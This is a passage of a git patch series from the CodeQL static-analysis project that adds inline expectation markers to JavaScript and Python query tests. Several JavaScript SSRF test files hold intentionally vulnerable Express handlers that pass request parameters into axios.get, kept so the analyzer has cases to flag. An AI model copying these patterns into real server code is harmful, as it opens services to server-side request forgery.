depends on a user-provided value. | -| check-path.js:19:13:19:43 | 'test.c ... tainted | check-path.js:19:27:19:43 | req.query.tainted | check-path.js:19:13:19:43 | 'test.c ... tainted | The URL of this request depends on a user-provided value. | -| check-path.js:23:13:23:45 | `/addre ... inted}` | check-path.js:23:27:23:43 | req.query.tainted | check-path.js:23:13:23:45 | `/addre ... inted}` | The URL of this request depends on a user-provided value. | -| check-path.js:33:15:33:45 | 'test.c ... tainted | check-path.js:33:29:33:45 | req.query.tainted | check-path.js:33:15:33:45 | 'test.c ... tainted | The URL of this request depends on a user-provided value. | -| check-path.js:37:15:37:45 | 'test.c ... tainted | check-path.js:37:29:37:45 | req.query.tainted | check-path.js:37:15:37:45 | 'test.c ... tainted | The URL of this request depends on a user-provided value. | -| check-path.js:45:13:45:44 | `${base ... inted}` | check-path.js:45:26:45:42 | req.query.tainted | check-path.js:45:13:45:44 | `${base ... inted}` | The URL of this request depends on a user-provided value. | -| check-regex.js:16:15:16:45 | "test.c ... tainted | check-regex.js:16:29:16:45 | req.query.tainted | check-regex.js:16:15:16:45 | "test.c ... tainted | The URL of this request depends on a user-provided value. | -| check-regex.js:24:15:24:42 | baseURL ... tainted | check-regex.js:24:25:24:42 | req.params.tainted | check-regex.js:24:15:24:42 | baseURL ... tainted | The URL of this request depends on a user-provided value. | -| check-regex.js:31:15:31:45 | "test.c ... tainted | check-regex.js:31:29:31:45 | req.query.tainted | check-regex.js:31:15:31:45 | "test.c ... tainted | The URL of this request depends on a user-provided value. | -| check-regex.js:34:15:34:42 | baseURL ... tainted | check-regex.js:34:25:34:42 | req.params.tainted | check-regex.js:34:15:34:42 | baseURL ... tainted | The URL of this request depends on a user-provided value. | -| check-regex.js:41:13:41:43 | "test.c ... tainted | check-regex.js:41:27:41:43 | req.query.tainted | check-regex.js:41:13:41:43 | "test.c ... tainted | The URL of this request depends on a user-provided value. | -| check-regex.js:61:15:61:42 | baseURL ... tainted | check-regex.js:61:25:61:42 | req.params.tainted | check-regex.js:61:15:61:42 | baseURL ... tainted | The URL of this request depends on a user-provided value. | -| check-validator.js:15:15:15:45 | "test.c ... tainted | check-validator.js:15:29:15:45 | req.query.tainted | check-validator.js:15:15:15:45 | "test.c ... tainted | The URL of this request depends on a user-provided value. | -| check-validator.js:27:15:27:45 | "test.c ... tainted | check-validator.js:27:29:27:45 | req.query.tainted | check-validator.js:27:15:27:45 | "test.c ... tainted | The URL of this request depends on a user-provided value. | -| check-validator.js:50:15:50:45 | "test.c ... tainted | check-validator.js:50:29:50:45 | req.query.tainted | check-validator.js:50:15:50:45 | "test.c ... tainted | The URL of this request depends on a user-provided value. | -| check-validator.js:59:15:59:45 | "test.c ... tainted | check-validator.js:59:29:59:45 | req.query.tainted | check-validator.js:59:15:59:45 | "test.c ... tainted | The URL of this request depends on a user-provided value. | -| check-validator.js:62:15:62:37 | "test.c ... mberURL | check-validator.js:54:21:54:37 | req.query.tainted | check-validator.js:62:15:62:37 | "test.c ... mberURL | The URL of this request depends on a user-provided value. | -| check-validator.js:68:15:68:45 | "test.c ... tainted | check-validator.js:68:29:68:45 | req.query.tainted | check-validator.js:68:15:68:45 | "test.c ... tainted | The URL of this request depends on a user-provided value. | diff --git a/javascript/ql/test/experimental/Security/CWE-918/SSRF.qlref b/javascript/ql/test/experimental/Security/CWE-918/SSRF.qlref index 05a9c8145e60..7819b4827f28 100644 --- a/javascript/ql/test/experimental/Security/CWE-918/SSRF.qlref +++ b/javascript/ql/test/experimental/Security/CWE-918/SSRF.qlref @@ -1 +1,2 @@ -./experimental/Security/CWE-918/SSRF.ql \ No newline at end of file +query: ./experimental/Security/CWE-918/SSRF.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/experimental/Security/CWE-918/check-domain.js b/javascript/ql/test/experimental/Security/CWE-918/check-domain.js index 0821140ab5fe..4559d14e8036 100644 --- a/javascript/ql/test/experimental/Security/CWE-918/check-domain.js +++ b/javascript/ql/test/experimental/Security/CWE-918/check-domain.js @@ -13,8 +13,8 @@ const app = express(); app.get('/check-with-axios', req => { // without validation - const url = req.query.url; - axios.get(url); //SSRF + const url = req.query.url; // $ Source + axios.get(url); //SSRF // $ Alert // validating domain only const decodedURI = decodeURIComponent(req.query.url); @@ -23,7 +23,7 @@ app.get('/check-with-axios', req => { const { hostname } = url.parse(decodedURI); if (isValidDomain(hostname, validDomains)) { - axios.get(req.query.url); //SSRF + axios.get(req.query.url); //SSRF // $ Alert } }); diff --git a/javascript/ql/test/experimental/Security/CWE-918/check-middleware.js b/javascript/ql/test/experimental/Security/CWE-918/check-middleware.js index 2a1e6d541665..721250e80afd 100644 --- a/javascript/ql/test/experimental/Security/CWE-918/check-middleware.js +++ b/javascript/ql/test/experimental/Security/CWE-918/check-middleware.js @@ -6,7 +6,7 @@ const express = require('express'); const app = express(); app.get('/check-with-axios', validationMiddleware, req => { - axios.get("test.com/" + req.query.tainted); // OK is sanitized by the middleware - False Positive + axios.get("test.com/" + req.query.tainted); // OK is sanitized by the middleware - False Positive // $ Alert }); diff --git a/javascript/ql/test/experimental/Security/CWE-918/check-path.js b/javascript/ql/test/experimental/Security/CWE-918/check-path.js index b26e4924460f..9888a28b383c 100644 --- a/javascript/ql/test/experimental/Security/CWE-918/check-path.js +++ b/javascript/ql/test/experimental/Security/CWE-918/check-path.js @@ -16,11 +16,11 @@ app.get('/check-with-axios', req => { const hardcoded = 'hardcodeado'; axios.get('test.com/' + hardcoded); // OK - axios.get('test.com/' + req.query.tainted); // SSRF + axios.get('test.com/' + req.query.tainted); // SSRF // $ Alert axios.get('test.com/' + Number(req.query.tainted)); // OK axios.get('test.com/' + req.user.id); // OK axios.get('test.com/' + encodeURIComponent(req.query.tainted)); // OK - axios.get(`/addresses/${req.query.tainted}`); // SSRF + axios.get(`/addresses/${req.query.tainted}`); // SSRF // $ Alert axios.get(`/addresses/${encodeURIComponent(req.query.tainted)}`); // OK if (Number.isInteger(req.query.tainted)) { @@ -30,11 +30,11 @@ app.get('/check-with-axios', req => { if (isValidInput(req.query.tainted)){ axios.get('test.com/' + req.query.tainted); // OK } else { - axios.get('test.com/' + req.query.tainted); // SSRF + axios.get('test.com/' + req.query.tainted); // SSRF // $ Alert } if (doesntCheckAnything(req.query.tainted)) { - axios.get('test.com/' + req.query.tainted); // SSRF + axios.get('test.com/' + req.query.tainted); // SSRF // $ Alert } if (isValidPath(req.query.tainted, VALID_PATHS)) { @@ -42,7 +42,7 @@ app.get('/check-with-axios', req => { } let baseURL = require('config').base - axios.get(`${baseURL}${req.query.tainted}`); // SSRF + axios.get(`${baseURL}${req.query.tainted}`); // SSRF // $ Alert if(!isValidInput(req.query.tainted)) { return; diff --git a/javascript/ql/test/experimental/Security/CWE-918/check-regex.js b/javascript/ql/test/experimental/Security/CWE-918/check-regex.js index 238aa9068432..f5b4f908e636 100644 --- a/javascript/ql/test/experimental/Security/CWE-918/check-regex.js +++ b/javascript/ql/test/experimental/Security/CWE-918/check-regex.js @@ -13,7 +13,7 @@ app.get('/check-with-axios', req => { axios.get("test.com/" + req.query.tainted); // OK } if (req.query.tainted.match(/^.*$/)) { // anything - axios.get("test.com/" + req.query.tainted); // SSRF - False Negative + axios.get("test.com/" + req.query.tainted); // SSRF - False Negative // $ Alert } const baseURL = "test.com/" @@ -21,24 +21,24 @@ app.get('/check-with-axios', req => { axios.get(baseURL + req.params.tainted); // OK } if (!isValidPath(req.params.tainted) ) { - axios.get(baseURL + req.params.tainted); // SSRF + axios.get(baseURL + req.params.tainted); // SSRF // $ Alert } else { axios.get(baseURL + req.params.tainted); // OK } // Blacklists are not safe if (!req.query.tainted.match(/^[/\.%]+$/)) { - axios.get("test.com/" + req.query.tainted); // SSRF + axios.get("test.com/" + req.query.tainted); // SSRF // $ Alert } if (!isInBlacklist(req.params.tainted) ) { - axios.get(baseURL + req.params.tainted); // SSRF + axios.get(baseURL + req.params.tainted); // SSRF // $ Alert } if (!isValidPath(req.params.tainted)) { return; } - axios.get("test.com/" + req.query.tainted); // OK - False Positive + axios.get("test.com/" + req.query.tainted); // OK - False Positive // $ Alert if (req.query.tainted.matchAll(/^[0-9a-z]+$/g)) { // letters and numbers axios.get("test.com/" + req.query.tainted); // OK @@ -58,7 +58,7 @@ app.get('/check-with-axios', req => { axios.get(baseURL + req.params.tainted); // OK } if (!isValidPathMatchAll(req.params.tainted) ) { - axios.get(baseURL + req.params.tainted); // NOT OK - SSRF + axios.get(baseURL + req.params.tainted); // NOT OK - SSRF // $ Alert } else { axios.get(baseURL + req.params.tainted); // OK } diff --git a/javascript/ql/test/experimental/Security/CWE-918/check-validator.js b/javascript/ql/test/experimental/Security/CWE-918/check-validator.js index dfe3314b07b3..1e170036c44a 100644 --- a/javascript/ql/test/experimental/Security/CWE-918/check-validator.js +++ b/javascript/ql/test/experimental/Security/CWE-918/check-validator.js @@ -12,7 +12,7 @@ app.get("/check-with-axios", req => { axios.get("test.com/" + req.query.tainted); // OK } if (isAlphanumeric(req.query.tainted)) { - axios.get("test.com/" + req.query.tainted); // SSRF + axios.get("test.com/" + req.query.tainted); // SSRF // $ Alert } if (validAlphanumeric(req.query.tainted)) { axios.get("test.com/" + req.query.tainted); // OK @@ -24,7 +24,7 @@ app.get("/check-with-axios", req => { axios.get("test.com/" + req.query.tainted); // OK } if (wrongValidation(req.query.tainted)) { - axios.get("test.com/" + req.query.tainted); // SSRF + axios.get("test.com/" + req.query.tainted); // SSRF // $ Alert } // numbers @@ -47,25 +47,25 @@ app.get("/check-with-axios", req => { axios.get("test.com/" + req.query.tainted); // OK } if (validHexa(req.query.tainted)) { - axios.get("test.com/" + req.query.tainted); // OK. False Positive + axios.get("test.com/" + req.query.tainted); // OK. False Positive // $ Alert } // with simple assignation - const numberURL = req.query.tainted; + const numberURL = req.query.tainted; // $ Source if (validNumber(numberURL)) { axios.get("test.com/" + numberURL); // OK } if (validNumber(numberURL)) { - axios.get("test.com/" + req.query.tainted); // OK. False Positive + axios.get("test.com/" + req.query.tainted); // OK. False Positive // $ Alert } if (validNumber(req.query.tainted)) { - axios.get("test.com/" + numberURL); // OK. False Positive + axios.get("test.com/" + numberURL); // OK. False Positive // $ Alert } if (validHexadecimal(req.query.tainted) || validHexaColor(req.query.tainted) || validDecimal(req.query.tainted) || validFloat(req.query.tainted) || validInt(req.query.tainted) || validNumber(req.query.tainted) || validOctal(req.query.tainted)) { - axios.get("test.com/" + req.query.tainted); // OK. False Positive + axios.get("test.com/" + req.query.tainted); // OK. False Positive // $ Alert } }); diff --git a/javascript/ql/test/experimental/StandardLibrary/MultipleArgumentsToSetConstructor/MultipleArgumentsToSetConstructor.qlref b/javascript/ql/test/experimental/StandardLibrary/MultipleArgumentsToSetConstructor/MultipleArgumentsToSetConstructor.qlref index 3cba54a3a0c5..51cb2f3db8ba 100644 --- a/javascript/ql/test/experimental/StandardLibrary/MultipleArgumentsToSetConstructor/MultipleArgumentsToSetConstructor.qlref +++ b/javascript/ql/test/experimental/StandardLibrary/MultipleArgumentsToSetConstructor/MultipleArgumentsToSetConstructor.qlref @@ -1 +1,2 @@ -experimental/StandardLibrary/MultipleArgumentsToSetConstructor.ql +query: experimental/StandardLibrary/MultipleArgumentsToSetConstructor.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/experimental/StandardLibrary/MultipleArgumentsToSetConstructor/MultipleArgumentsToSetConstructorBad.js b/javascript/ql/test/experimental/StandardLibrary/MultipleArgumentsToSetConstructor/MultipleArgumentsToSetConstructorBad.js index 4bce4b54c1b4..ea51918032a2 100644 --- a/javascript/ql/test/experimental/StandardLibrary/MultipleArgumentsToSetConstructor/MultipleArgumentsToSetConstructorBad.js +++ b/javascript/ql/test/experimental/StandardLibrary/MultipleArgumentsToSetConstructor/MultipleArgumentsToSetConstructorBad.js @@ -1,4 +1,4 @@ -const vowels = new Set('a', 'e', 'i', 'o', 'u'); +const vowels = new Set('a', 'e', 'i', 'o', 'u'); // $ Alert function isVowel(char) { return vowels.has(char.toLowerCase()); diff --git a/javascript/ql/test/experimental/StandardLibrary/MultipleArgumentsToSetConstructor/tst.js b/javascript/ql/test/experimental/StandardLibrary/MultipleArgumentsToSetConstructor/tst.js index 7f43ae5f9664..024c881ce4a9 100644 --- a/javascript/ql/test/experimental/StandardLibrary/MultipleArgumentsToSetConstructor/tst.js +++ b/javascript/ql/test/experimental/StandardLibrary/MultipleArgumentsToSetConstructor/tst.js @@ -1,6 +1,6 @@ let xs = [1, 2, 3]; let ys = [4, 5, 6]; -new Set(...xs, ...ys); // NOT OK +new Set(...xs, ...ys); // NOT OK // $ Alert new Set([...xs, ...ys]); // OK new Set(xs); // OK new Set(); // OK \ No newline at end of file diff --git a/javascript/ql/test/library-tests/frameworks/HTTP-heuristics/UnpromotedRouteHandlerCandidate.qlref b/javascript/ql/test/library-tests/frameworks/HTTP-heuristics/UnpromotedRouteHandlerCandidate.qlref index 51fb87eed725..c383d032bc09 100644 --- a/javascript/ql/test/library-tests/frameworks/HTTP-heuristics/UnpromotedRouteHandlerCandidate.qlref +++ b/javascript/ql/test/library-tests/frameworks/HTTP-heuristics/UnpromotedRouteHandlerCandidate.qlref @@ -1 +1,2 @@ -meta/analysis-quality/UnpromotedRouteHandlerCandidate.ql \ No newline at end of file +query: meta/analysis-quality/UnpromotedRouteHandlerCandidate.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/library-tests/frameworks/HTTP-heuristics/UnpromotedRouteSetupCandidate.qlref b/javascript/ql/test/library-tests/frameworks/HTTP-heuristics/UnpromotedRouteSetupCandidate.qlref index 5ce57dc19ba9..2ef54efcfd0a 100644 --- a/javascript/ql/test/library-tests/frameworks/HTTP-heuristics/UnpromotedRouteSetupCandidate.qlref +++ b/javascript/ql/test/library-tests/frameworks/HTTP-heuristics/UnpromotedRouteSetupCandidate.qlref @@ -1 +1,2 @@ -meta/analysis-quality/UnpromotedRouteSetupCandidate.ql \ No newline at end of file +query: meta/analysis-quality/UnpromotedRouteSetupCandidate.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/library-tests/frameworks/HTTP-heuristics/src/hapi.js b/javascript/ql/test/library-tests/frameworks/HTTP-heuristics/src/hapi.js index 581e2401e05e..9ea46e7ce68f 100644 --- a/javascript/ql/test/library-tests/frameworks/HTTP-heuristics/src/hapi.js +++ b/javascript/ql/test/library-tests/frameworks/HTTP-heuristics/src/hapi.js @@ -1 +1 @@ -function handler(request, h){} +function handler(request, h){} // $ Alert[js/unpromoted-route-handler-candidate] diff --git a/javascript/ql/test/library-tests/frameworks/HTTP-heuristics/src/nodejs.js b/javascript/ql/test/library-tests/frameworks/HTTP-heuristics/src/nodejs.js index 57bcde69d531..315c6dd1379b 100644 --- a/javascript/ql/test/library-tests/frameworks/HTTP-heuristics/src/nodejs.js +++ b/javascript/ql/test/library-tests/frameworks/HTTP-heuristics/src/nodejs.js @@ -2,14 +2,14 @@ var http = require('http'); http.createServer(function(req, res){}); -unknown.createServer(function(req, res){}); +unknown.createServer(function(req, res){}); // $ Alert[js/unpromoted-route-setup-candidate] var createServer = http.createServer; createServer(function(req, res){}); http.createServer().on("request", function(req, res){}); -unknown.on("request", function(req, res){}); -unknown.once("request", function(req, res){}); +unknown.on("request", function(req, res){}); // $ Alert[js/unpromoted-route-setup-candidate] +unknown.once("request", function(req, res){}); // $ Alert[js/unpromoted-route-setup-candidate] function getHandler(){ return function(req, res){}; diff --git a/javascript/ql/test/library-tests/frameworks/HTTP-heuristics/src/route-objects.js b/javascript/ql/test/library-tests/frameworks/HTTP-heuristics/src/route-objects.js index 64dbe4555600..2abb91d0f11b 100644 --- a/javascript/ql/test/library-tests/frameworks/HTTP-heuristics/src/route-objects.js +++ b/javascript/ql/test/library-tests/frameworks/HTTP-heuristics/src/route-objects.js @@ -4,10 +4,10 @@ var app = express(); var route1 = { method: 'post', url: '/foo', - middleWares: [function(req, res){}], + middleWares: [function(req, res){}], // $ Alert[js/unpromoted-route-handler-candidate] handler(req, res) { - } + } // $ Alert[js/unpromoted-route-handler-candidate] }; app[route1.method](route1.url, route1.middleWares, route1.handler); @@ -19,14 +19,14 @@ var routes = [ url: '/foo', handler(req, res) { - } + } // $ Alert[js/unpromoted-route-handler-candidate] }, { method: 'post', url: '/foo', handler(req, res) { - } + } // $ Alert[js/unpromoted-route-handler-candidate] } ]; routes.forEach((route) => { @@ -39,7 +39,7 @@ var route2 = { url: '/foo', handler(req, res) { - } + } // $ Alert[js/unpromoted-route-handler-candidate] }; app[route2.method.toLowerCase()](route2.url, route2.handler); @@ -49,13 +49,13 @@ var route3 = { url: '/foo', handler(req, res) { - } + } // $ Alert[js/unpromoted-route-handler-candidate] }; function wrap(f){ return function(req, res){ f(req); - } + } // $ Alert[js/unpromoted-route-handler-candidate] } app[route3.method](route3.url, wrap(route3.handler)); confuse(wrap); // confuse the type inference diff --git a/javascript/ql/test/library-tests/frameworks/HTTP-heuristics/src/tst.js b/javascript/ql/test/library-tests/frameworks/HTTP-heuristics/src/tst.js index e2d6cfd1ebf0..871ddf9603b7 100644 --- a/javascript/ql/test/library-tests/frameworks/HTTP-heuristics/src/tst.js +++ b/javascript/ql/test/library-tests/frameworks/HTTP-heuristics/src/tst.js @@ -3,9 +3,9 @@ var app = express(); app.get('/some/path', function(req, res) {}) -someOtherApp.get('/some/path', function(req, res) {}) +someOtherApp.get('/some/path', function(req, res) {}) // $ Alert[js/unpromoted-route-setup-candidate] -someOtherApp.get('/some/path', function(request, response) {}) +someOtherApp.get('/some/path', function(request, response) {}) // $ Alert[js/unpromoted-route-setup-candidate] someOtherApp.get('/some/path', function(r) { r.acceptsCharsets() @@ -27,23 +27,23 @@ someOtherApp.get('/some/path', function(r, s, n) { n('route') }) -someOtherApp.delete('/some/path', function(req, res) {}) +someOtherApp.delete('/some/path', function(req, res) {}) // $ Alert[js/unpromoted-route-setup-candidate] someOtherApp.get('/some/path', function(req, res) {}, - function(req, res) {}) + function(req, res) {}) // $ Alert[js/unpromoted-route-setup-candidate] someOtherApp.get('/some/path', [ function(req, res) {}, function(req, res) {} -]) +]) // $ Alert[js/unpromoted-route-setup-candidate] someOtherApp.get('/some/path', function() {}, - function(req, res) {}) + function(req, res) {}) // $ Alert[js/unpromoted-route-setup-candidate] -function f(req, res) {} +function f(req, res) {} // $ Alert[js/unpromoted-route-handler-candidate] function f(ctx, next) { ctx.acceptsCharsets() @@ -51,25 +51,25 @@ function f(ctx, next) { function f(req, res) { req() -} +} // $ Alert[js/unpromoted-route-handler-candidate] function called(req,res) { -} +} // $ Alert[js/unpromoted-route-handler-candidate] called() function f(req,res) { return; -} +} // $ Alert[js/unpromoted-route-handler-candidate] function f(req,res) { return x; -} +} // $ Alert[js/unpromoted-route-handler-candidate] function adHocTestsFor_HeuristicRouteHandler() { function rh_dead(req, res) { - } + } // $ Alert[js/unpromoted-route-handler-candidate] function rh_flowToSetup(req, res) { @@ -84,7 +84,7 @@ function adHocTestsFor_HeuristicRouteHandler() { function rh_flowToHeuristicSetup(req, res) { } - unknownApp.get('/some/path', rh_flowToHeuristicSetup) + unknownApp.get('/some/path', rh_flowToHeuristicSetup) // $ Alert[js/unpromoted-route-setup-candidate] } function adHocTestsFor_HeuristicRouteSetups() { @@ -93,22 +93,22 @@ function adHocTestsFor_HeuristicRouteSetups() { } app.get('/some/path', rh); - unknownApp.get('/some/path', rh); + unknownApp.get('/some/path', rh); // $ Alert[js/unpromoted-route-setup-candidate] - unknownApp.get('/some/path', [rh]); + unknownApp.get('/some/path', [rh]); // $ Alert[js/unpromoted-route-setup-candidate] unknownApp.get('/some/path', unknown); unknownApp.get('/some/path', [unknown]); - unknownApp.get('/some/path', unknown, rh); + unknownApp.get('/some/path', unknown, rh); // $ Alert[js/unpromoted-route-setup-candidate] } function adHocTestsFor_HeuristicRouteHandler_withTracking() { function get_rh_dead() { return function rh_dead(req, res) { - } + } // $ Alert[js/unpromoted-route-handler-candidate] } var rh_dead = get_rh_dead(); @@ -134,7 +134,7 @@ function adHocTestsFor_HeuristicRouteHandler_withTracking() { } } var rh_flowToHeuristicSetup = get_rh_flowToHeuristicSetup(); - unknownApp.get('/some/path', rh_flowToHeuristicSetup) + unknownApp.get('/some/path', rh_flowToHeuristicSetup) // $ Alert[js/unpromoted-route-setup-candidate] } function adHocTestsFor_HeuristicRouteSetups_withTracking() { @@ -146,13 +146,13 @@ function adHocTestsFor_HeuristicRouteSetups_withTracking() { var rh = get_rh(); app.get('/some/path', rh); - unknownApp.get('/some/path', rh); + unknownApp.get('/some/path', rh); // $ Alert[js/unpromoted-route-setup-candidate] - unknownApp.get('/some/path', [rh]); + unknownApp.get('/some/path', [rh]); // $ Alert[js/unpromoted-route-setup-candidate] unknownApp.get('/some/path', unknown); unknownApp.get('/some/path', [unknown]); - unknownApp.get('/some/path', unknown, rh); + unknownApp.get('/some/path', unknown, rh); // $ Alert[js/unpromoted-route-setup-candidate] } diff --git a/javascript/ql/test/library-tests/frameworks/Templating/CodeInjection.qlref b/javascript/ql/test/library-tests/frameworks/Templating/CodeInjection.qlref index fe9adbf3b64d..8783ddb3a8a6 100644 --- a/javascript/ql/test/library-tests/frameworks/Templating/CodeInjection.qlref +++ b/javascript/ql/test/library-tests/frameworks/Templating/CodeInjection.qlref @@ -1 +1 @@ -Security/CWE-094/CodeInjection.ql +query: Security/CWE-094/CodeInjection.ql diff --git a/javascript/ql/test/query-tests/AlertSuppression/AlertSuppression.qlref b/javascript/ql/test/query-tests/AlertSuppression/AlertSuppression.qlref index 9d7833eccae7..dc898fca718c 100644 --- a/javascript/ql/test/query-tests/AlertSuppression/AlertSuppression.qlref +++ b/javascript/ql/test/query-tests/AlertSuppression/AlertSuppression.qlref @@ -1 +1 @@ -AlertSuppression.ql +query: AlertSuppression.ql diff --git a/javascript/ql/test/query-tests/Diagnostics/ExtractedFiles.qlref b/javascript/ql/test/query-tests/Diagnostics/ExtractedFiles.qlref index 2fe8364c4ea7..58bc903a431d 100644 --- a/javascript/ql/test/query-tests/Diagnostics/ExtractedFiles.qlref +++ b/javascript/ql/test/query-tests/Diagnostics/ExtractedFiles.qlref @@ -1 +1 @@ -Diagnostics/ExtractedFiles.ql \ No newline at end of file +query: Diagnostics/ExtractedFiles.ql diff --git a/javascript/ql/test/query-tests/Diagnostics/ExtractionErrors.qlref b/javascript/ql/test/query-tests/Diagnostics/ExtractionErrors.qlref index 5e501b2469d2..20403d282f0a 100644 --- a/javascript/ql/test/query-tests/Diagnostics/ExtractionErrors.qlref +++ b/javascript/ql/test/query-tests/Diagnostics/ExtractionErrors.qlref @@ -1 +1 @@ -Diagnostics/ExtractionErrors.ql \ No newline at end of file +query: Diagnostics/ExtractionErrors.ql diff --git a/javascript/ql/test/query-tests/Metrics/ExternalDependencies/ExternalDependencies.qlref b/javascript/ql/test/query-tests/Metrics/ExternalDependencies/ExternalDependencies.qlref index aa190bb0a9a9..8b37766f8302 100644 --- a/javascript/ql/test/query-tests/Metrics/ExternalDependencies/ExternalDependencies.qlref +++ b/javascript/ql/test/query-tests/Metrics/ExternalDependencies/ExternalDependencies.qlref @@ -1 +1 @@ -Metrics/Dependencies/ExternalDependencies.ql \ No newline at end of file +query: Metrics/Dependencies/ExternalDependencies.ql diff --git a/javascript/ql/test/query-tests/Metrics/FLinesOfCode/FLinesOfCode.qlref b/javascript/ql/test/query-tests/Metrics/FLinesOfCode/FLinesOfCode.qlref index f1524eec4972..6a2c24b94b1d 100644 --- a/javascript/ql/test/query-tests/Metrics/FLinesOfCode/FLinesOfCode.qlref +++ b/javascript/ql/test/query-tests/Metrics/FLinesOfCode/FLinesOfCode.qlref @@ -1 +1 @@ -Metrics/FLinesOfCode.ql \ No newline at end of file +query: Metrics/FLinesOfCode.ql diff --git a/javascript/ql/test/query-tests/Summary/LinesOfCode.qlref b/javascript/ql/test/query-tests/Summary/LinesOfCode.qlref index ac8650d6dcc4..d22b10044239 100644 --- a/javascript/ql/test/query-tests/Summary/LinesOfCode.qlref +++ b/javascript/ql/test/query-tests/Summary/LinesOfCode.qlref @@ -1 +1 @@ -Summary/LinesOfCode.ql \ No newline at end of file +query: Summary/LinesOfCode.ql diff --git a/javascript/ql/test/query-tests/Summary/LinesOfUserCode.qlref b/javascript/ql/test/query-tests/Summary/LinesOfUserCode.qlref index 548874fe786a..99a6d1324943 100644 --- a/javascript/ql/test/query-tests/Summary/LinesOfUserCode.qlref +++ b/javascript/ql/test/query-tests/Summary/LinesOfUserCode.qlref @@ -1 +1 @@ -Summary/LinesOfUserCode.ql \ No newline at end of file +query: Summary/LinesOfUserCode.ql diff --git a/javascript/ql/test/query-tests/definitions/definitions.qlref b/javascript/ql/test/query-tests/definitions/definitions.qlref index 7b600c094b54..89fab02d1037 100644 --- a/javascript/ql/test/query-tests/definitions/definitions.qlref +++ b/javascript/ql/test/query-tests/definitions/definitions.qlref @@ -1 +1 @@ -definitions.ql +query: definitions.ql diff --git a/javascript/ql/test/query-tests/filters/ClassifyFiles/ClassifyFiles.qlref b/javascript/ql/test/query-tests/filters/ClassifyFiles/ClassifyFiles.qlref index 638bf4567627..612f5dfb3322 100644 --- a/javascript/ql/test/query-tests/filters/ClassifyFiles/ClassifyFiles.qlref +++ b/javascript/ql/test/query-tests/filters/ClassifyFiles/ClassifyFiles.qlref @@ -1 +1 @@ -filters/ClassifyFiles.ql \ No newline at end of file +query: filters/ClassifyFiles.ql From 8e0769004975d9dc3bfe34b6c7db64702e535fc1 Mon Sep 17 00:00:00 2001 From: Owen Mansel-Chan Date: Wed, 10 Jun 2026 22:57:42 +0200 Subject: [PATCH 05/15] Python --- .../inconsistent-mro/InconsistentMRO.qlref | 3 +- .../inconsistent-mro/inconsistent_mro.py | 2 +- .../new-style/PropertyInOldStyleClass.qlref | 3 +- .../new-style/SlotsInOldStyleClass.qlref | 3 +- .../new-style/SuperInOldStyleClass.qlref | 3 +- .../Classes/new-style/newstyle_test.py | 4 +- .../Classes/new-style/property_old_style.py | 2 +- .../MaybeUndefinedClassAttribute.qlref | 3 +- .../UndefinedClassAttribute.qlref | 3 +- .../general/CatchingBaseException.qlref | 3 +- .../Exceptions/general/EmptyExcept.qlref | 3 +- .../general/IllegalExceptionHandlerType.qlref | 3 +- .../Exceptions/general/IllegalRaise.qlref | 3 +- .../general/IncorrectExceptOrder.qlref | 3 +- .../Exceptions/general/exceptions_test.py | 2 +- .../generators/UnguardedNextInGenerator.qlref | 3 +- .../query-tests/Exceptions/generators/test.py | 4 +- .../Exceptions/raising/RaisingTuple.qlref | 3 +- .../2/query-tests/Exceptions/raising/test.py | 6 +- .../Expressions/TruncatedDivision.qlref | 3 +- .../Expressions/TruncatedDivision_test.py | 4 +- .../2/query-tests/Expressions/UseofApply.py | 2 +- .../query-tests/Expressions/UseofApply.qlref | 3 +- .../query-tests/Expressions/UseofInput.qlref | 3 +- .../Expressions/expressions_test.py | 4 +- .../Functions/DeprecatedSliceMethod.qlref | 3 +- .../encoding_error/EncodingError.qlref | 3 +- .../Imports/syntax_error/EncodingError.qlref | 3 +- .../Imports/syntax_error/SyntaxError.qlref | 3 +- .../Imports/syntax_error/bad_encoding.py | 2 +- .../Imports/syntax_error/nonsense.py | 2 +- .../query-tests/Lexical/OldOctalLiteral.qlref | 3 +- .../2/query-tests/Lexical/lexical_test.py | 2 +- .../2/query-tests/Statements/ExecUsed.qlref | 3 +- .../Statements/IterableStringOrSequence.qlref | 3 +- .../Statements/TopLevelPrint.qlref | 3 +- .../test/2/query-tests/Statements/module.py | 2 +- .../query-tests/Statements/statements_test.py | 4 +- .../2/query-tests/Summary/LinesOfCode.qlref | 2 +- .../query-tests/Summary/LinesOfUserCode.qlref | 2 +- .../Variables/LeakyComp/LeakyComp.qlref | 3 +- .../2/query-tests/Variables/LeakyComp/test.py | 4 +- .../Variables/undefined/UndefinedExport.py | 2 +- .../Variables/undefined/UndefinedExport.qlref | 3 +- .../Variables/undefined/UndefinedGlobal.qlref | 3 +- .../undefined/UninitializedLocal.qlref | 3 +- .../Variables/undefined/package/__init__.py | 2 +- .../DefineEqualsWhenAddingAttributes.qlref | 3 +- .../3/query-tests/Classes/equals-attr/test.py | 2 +- .../inconsistent-mro/InconsistentMRO.qlref | 3 +- .../inconsistent-mro/inconsistent_mro.py | 4 +- .../MaybeUndefinedClassAttribute.qlref | 3 +- .../UndefinedClassAttribute.qlref | 3 +- .../WrongNameForArgumentInCall.qlref | 3 +- .../WrongNumberArgumentsInCall.qlref | 3 +- .../Expressions/Arguments/wrong_arguments.py | 6 +- .../WrongNumberArgumentsForFormat.qlref | 3 +- .../TruncatedDivision/TruncatedDivision.qlref | 3 +- .../Expressions/UseofApply/UseofApply.qlref | 3 +- .../encoding_error/EncodingError.qlref | 3 +- .../Imports/syntax_error/EncodingError.qlref | 3 +- .../Imports/syntax_error/SyntaxError.qlref | 3 +- .../Imports/syntax_error/bad_encoding.py | 2 +- .../Imports/syntax_error/nonsense.py | 2 +- .../Statements/general/ExecUsed.qlref | 3 +- .../Statements/general/TopLevelPrint.qlref | 3 +- .../query-tests/Statements/general/module.py | 2 +- .../Statements/general/statements_test.py | 2 +- .../iter/IterableStringOrSequence.qlref | 3 +- .../iter/NonIteratorInForLoop.qlref | 3 +- .../Statements/iter/async_iterator.py | 2 +- .../Statements/iter/statements_test.py | 4 +- .../unreachable/UnreachableCode.qlref | 3 +- .../UnreachableCode.qlref | 3 +- .../3/query-tests/Summary/LinesOfCode.qlref | 2 +- .../query-tests/Summary/LinesOfUserCode.qlref | 2 +- .../Variables/undefined/UndefinedExport.py | 2 +- .../Variables/undefined/UndefinedExport.qlref | 3 